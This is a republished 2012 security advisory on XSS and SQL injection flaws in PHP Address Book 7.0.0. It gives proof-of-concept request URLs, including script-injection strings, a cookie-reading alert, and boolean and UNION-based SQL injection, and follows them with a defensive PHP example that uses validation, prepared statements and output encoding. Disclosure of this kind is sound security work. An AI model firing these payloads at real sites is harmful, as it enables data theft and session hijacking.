PHP Address Book 7.0.0: Multiple Vulnerabilities and Fixes
Updated: 2012-05-25 | Posted by: this site | Views: 527

Title: PHP Address Book 7.0.0 Multiple security vulnerabilities

Author: Stefan Schurtz
Affected software: Successfully tested on PHP Address Book 7.0.0
Developer website: http://sourceforge.net/projects/php-addressbook/
Vulnerability description

PHP Address Book 7.0.0 contains multiple XSS and SQLi vulnerabilities.

Test method
 
// XSS
 
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.xxx.com/addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
 
// SQLi
 
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
 
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
 
Fix:
Strengthen filtering.
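
What stronger filtering can look like for the `id`, `from` and `group` parameters tested above. This is an added example, not PHP Address Book's own code: the `contacts` table, its columns, and the functions `parse_id`, `find_contact` and `h` are hypothetical, and the request values are constructed. It assumes the `pdo_sqlite` extension so that it runs offline.

```php
<?php
// Added example: NOT PHP Address Book's code. Table, column and function
// names are hypothetical; the sample row and request values are constructed.

// Accept only a positive integer; anything else never reaches SQL.
function parse_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bind the id as a typed parameter so it cannot alter the query structure.
function find_contact(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM contacts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Encode on output: quotes and angle brackets become HTML entities.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO contacts (name) VALUES ('Alice Example')");

// Constructed request values shaped like the test strings in this advisory.
$requests = [
    ['id' => '1', 'group' => 'friends'],
    ['id' => '1 AND 1=IF(1<2,2,1)', 'group' => '\'"</script><script>alert(1)</script>'],
];

foreach ($requests as $q) {
    $id  = parse_id($q['id']);
    $row = $id === null ? null : find_contact($db, $id);
    echo 'id: ', $id === null ? 'rejected' : h($row['name'] ?? 'not found'), "\n";
    echo 'group: <input value="', h($q['group']), "\">\n";
}
```

The second request is rejected at `parse_id`, and its `group` value is printed as inert entities rather than markup.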